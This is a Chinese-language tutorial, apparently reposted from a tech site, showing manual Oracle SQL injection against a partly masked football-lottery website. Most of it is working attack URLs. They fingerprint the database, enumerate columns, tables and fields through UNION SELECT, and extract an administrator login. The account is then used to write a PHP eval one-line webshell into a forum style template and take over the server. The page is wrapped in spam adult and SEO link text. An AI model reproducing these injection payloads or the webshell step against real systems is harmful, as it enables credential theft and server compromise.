成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

參考案例:手工Oracle注入某足彩在線網站

安全 應用安全
某足彩在線網站是一個大型的足彩站點,在其中存在著注入點,鏈接如下:http://www.****china.com/jst/md_end.jsp?id=76,以該注入點為例,講解如何進行Oracle手工注入攻擊檢測。

某足彩在線網站是一個大型的足彩站點,在其中存在著注入點,鏈接如下:http://www.****china.com/jst/md_end.jsp?id=76,以該注入點為例,講解如何進行Oracle手工注入攻擊檢測。

判斷注入點

在鏈接地址后加上單引號,返回信息"java.sql.SQLException: ORA-01756",可初步判斷為Oracle的數據庫。

在鏈接后添加提交"/*",返回錯誤頁面,說明數據庫不是MySQL的。繼續在注入點鏈接后添加"--",顯示正常頁面,說明數據庫可能為MSSQL和Oracle。再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and (select count (*) from user_tables)>0--

http://www.****china.com/jst/md_end.jsp?id=76 and (select count (*) from dual)>0--

都返回正常頁面(圖1),確認為Oracle的數據庫。

圖1  確認Oracle注入

圖1  確認Oracle注入#p#

字段數目與字段類型檢測

先檢測注入點處查詢字段數目,提交:

http://www.****china.com/jst/md_end.jsp?id=76 order by 10  //返回錯誤頁面

http://www.****china.com/jst/md_end.jsp?id=76 order by 5  //返回正常頁面

http://www.****china.com/jst/md_end.jsp?id=76 order by 8  //返回錯誤頁面

http://www.****china.com/jst/md_end.jsp?id=76 order by 7  //返回正常頁面

說明當前表存在7個字段。下面再來檢測字段類型,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select 1,2,3,4,5,6,7 from dual

返回錯誤信息,提示(圖2):

expression must have same datatype

圖2  數據類型錯誤

圖2  數據類型錯誤#p#

很顯然,提交的字段類型不正確,所以查詢出錯。于是改為提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,null,null,null,null from dual

返回正常頁面,說明字段數目確實為7個,但是需要確定字段類型。依次提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select 'null',null,null,null,null,null,null from dual  //返回正常頁面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,'null',null,null,null,null,null from dual  //返回錯誤頁面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,'null',null,null,null,null from dual  //返回正常頁面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,'null',null,null,null from dual  //返回正常頁面

……

上面的查詢中,用'null'字符串檢測該字段處是否為字符型,如果返回正常頁面則說明為字符型數據,返回錯誤頁面,則說明該處為數字型。

提交檢測完畢后,確認1,3,4,6,7位置處為字符型。提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3','4',5,'6','7' from dual

返回正常頁面(圖3),說明字段類型正確。

圖3  確認數據類型

圖3  確認數據類型

檢測注入點信息

對注入點進行簡單的信息檢測,可選擇字符型字段處顯示要查詢的信息,提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select (select banner from sys.v_$version where rownum=1),2,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual), (select member from v$logfile where rownum=1),5,'6', (select instance_name from v$instance) from dual

從返回頁面中得到各種信息(圖4):

數據庫版本為Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi;

前數據庫連接用戶名為TOTO;

操作系統平臺為Linux;

服務器sid為racdb2。

圖4  返回注入點各種信息

圖4  返回注入點各種信息#p#

查詢獲取表名

先來查詢一下當前數據庫中的表名,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1),5,'6','7' from dual

這里選擇了字段4處返回信息,得到第1個表名為ACCOUNTS

圖5

這里選擇了字段4處返回信息,得到第1個表名為ACCOUNTS(圖5)。

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1 and table_name<>'ACCOUNTS'),5,'6','7' from dual

注意,表名一定要大寫。提交后返回第2個表名為A_USER。再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1 and table_name<>'ACCOUNTS' and table_name<>'A_USER'),5,'6','7' from dual

得到第3個表名BOBO_URL_INFO。用同樣的方法,可得到其它所有表名,發現其中有一個極為重要的表名USERMG。#p#

查詢獲取字段名及內容

選擇對USERMG表進行查詢,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select column_name from user_tab_columns where table_name='USERMG' and rownum=1),5,'6','7' from dual

返回USERMG表中第一個字段名USER_NAME,再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select column_name from user_tab_columns where table_name='USERMG' and column_name<>'USER_NAME' and rownum=1),5,'6','7' from dual

圖6  返回表中字段名

圖6  返回表中字段名

返回第2個字段名USER_PASS(圖6)。這兩個字段名很明顯是用來存儲用戶名和密碼的,直接查詢其內容:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select USERNAME,2,'3',USER_PASS,5,'6','7' from USERMG

返回頁面中,得到了用戶名和密碼為:admin/toto11admin(圖7)。

圖7  獲得管理員帳號數據

圖7  獲得管理員帳號數據#p#

登陸后臺上傳WebShell

沒有直接查找到網站的后臺,但是利用管理員帳號,可以從前臺進行登錄。登錄進入后,發現可進入體彩論壇,在論壇中在論壇后臺管理頁面,直接用此帳號進行登陸,進入論壇管理后臺。

在"論壇管理"→"界面風格"→"默認風格"→"詳情"中,點擊"新增變量",將變量內容設置為:

', '#999');eval($_POST[c]);

圖8  添加變量寫入一句話木馬

圖8  添加變量寫入一句話木馬

替換內容可隨便填(圖8)。點擊"提交"按鈕后,一句話木馬就被寫入模板風格文件中了。用一句話木馬連接論壇風格頁面文件:

http://bbs.****china.com/forumdata/cache/style_1.php

圖9  連接一句話木馬

圖9  連接一句話木馬

密碼為c,粘貼入要上傳的WebShell代碼內容,即可連接一句話木馬獲得WebShell(圖9)。WebShell的權限比較大,可輕易的控制遠程網站服務器。

【編輯推薦】

  1. Oracle注入點信息基本檢測
  2. Oracle listener程序所存在安全漏洞有哪些?
  3. OpenWorld案例分享:Oracle透明數據加密技術
  4. Oracle數據庫內部安全威脅:審計特權用戶
責任編輯:佟健 來源: 《大中型網絡入侵要案》
相關推薦

2013-01-11 16:31:27

2019-05-06 09:26:52

Java在線網站瀏覽器

2015-07-07 10:37:41

2015-04-03 09:35:57

2010-06-25 16:04:56

2012-03-31 14:00:13

CompuwareGomez應用性能測試

2025-01-14 14:10:40

2011-04-11 13:19:41

Oracle數據庫

2010-04-13 14:35:17

2013-03-29 10:57:45

2010-05-06 09:30:16

Oracle創建數據庫

2010-11-01 17:22:44

2010-04-07 11:56:58

Oracle JOB

2009-04-13 11:25:46

IBMdWEclipse

2009-01-26 20:33:17

2014-06-24 16:06:28

傲游瀏覽器

2009-07-03 16:22:13

2010-01-18 10:01:56

2009-11-04 17:52:35

Oracle用戶管理

2010-03-16 13:31:35

無線網關設備
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 一级毛片免费看 | av男人天堂影院 | 精品久久久久久久人人人人传媒 | 久久精品这里 | 国产精品美女久久久久久免费 | www.亚洲区| 精品视频免费在线 | 毛片99| 日韩成人在线播放 | 久久www免费人成看片高清 | 国产特一级黄色片 | 午夜小视频在线播放 | 日韩欧美在线视频 | 欧美日韩亚洲三区 | 国产欧美日韩二区 | 亚洲精品久久久久久国产精华液 | 在线精品一区二区 | 亚洲中国字幕 | 精品欧美一区二区精品久久 | 国产精品一区二区三区四区五区 | 国产一级视频在线播放 | 国产福利在线小视频 | 国产精品一区二区三区四区 | 日本五月婷婷 | 久久国产精品视频 | 色综合天天天天做夜夜夜夜做 | 日本久草 | 国产黄色在线 | 国产成人精品在线 | 精品久久香蕉国产线看观看亚洲 | 久久久国产一区二区三区四区小说 | 一区二区三区日韩精品 | 91秦先生艺校小琴 | 亚洲二区视频 | 国产高清在线精品一区二区三区 | 伊人久久麻豆 | 日本免费一区二区三区 | 午夜爽爽爽男女免费观看影院 | 亚洲欧美一区二区在线观看 | 成人18亚洲xxoo| 日韩精品中文字幕一区二区三区 |